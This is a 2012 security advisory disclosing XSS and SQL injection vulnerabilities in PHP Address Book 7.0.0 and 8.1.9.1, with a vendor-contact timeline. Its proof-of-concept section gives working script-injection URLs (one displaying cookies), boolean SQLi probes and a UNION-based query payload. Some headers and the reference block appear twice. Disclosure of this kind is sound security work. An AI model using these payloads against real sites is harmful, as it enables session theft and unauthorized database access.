SSCHADV2012-013 - PHP Address Book 7.0.0 and 8.1.9.1 Multiple security vulnerabilities
Advisory:
|
PHP Address Book 7.0.0 and 8.1.9.1 Multiple security vulnerabilities
|
Advisory ID: | SSCHADV2012-013 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on PHP Address Book 7.0.0 and 8.1.9.1 (latest version) |
Vendor URL: | |
Vendor Status: |
informed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
PHP Address Book 7.0.0 and 8.1.9.1 are prone to multiple XSS and SQLi vulnerabilities
==============
PoC-Exploit
==============
// XSS
PoC-Exploit
==============
// XSS
# GET
http://[target]/addressbookv/preferences.php?from=‘"</script><script>alert(‘xss’)</script>
http://[target]/addressbookv/group.php/" /><script> alert(‘xss’)</script> http://[target]/addressbookv/index.php?group=‘"</script><script>alert(document.cookie)</script> # POST
http://[target]/addressbookv/translate.php?lang=en&target_language=en&Mode=Range# -> POST-Parameter ‘target_language’ -> <script>alert(‘xss’)</script>
http://[target]/addressbookv/translate.php?lang=en&target_language=en&Mode=Range# -> POST-Parameter ‘target_flag’ -> <script>alert(‘xss’)</script> http://[target]/addressbookv/translate.php?lang=en&target_language=‘"/><script>alert(‘xss’)</script>&Mode=Range# |
// SQLi
http://[target]/addressbookv/edit.php?id=1 AND 1=IF(1<2,2,1) http://[target]/addressbookv/edit.php?id=1 AND 1=IF(1>2,2,1) |
// UNION-based Injection, needs ‘magic_quotes=off’
http://[target]/addressbookv/view.php?id=1‘ UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL—+ |
=====
Solution
=====
-
================
Disclosure Timeline
================
16-May-2012 – vendor informed
05-Jul-2012 – advisory updated: latest version is still vulnerable
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
https://sourceforge.net/tracker/?func=detail&aid=3527242&group_id=157964&atid=8059299
http://www.darksecurity.de/advisories/2012/SSCHADV2012-013.txt
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
https://sourceforge.net/tracker/?func=detail&aid=3527242&group_id=157964&atid=8059299
http://www.darksecurity.de/advisories/2012/SSCHADV2012-013.txt
Comments
Display comments as Linear | Threaded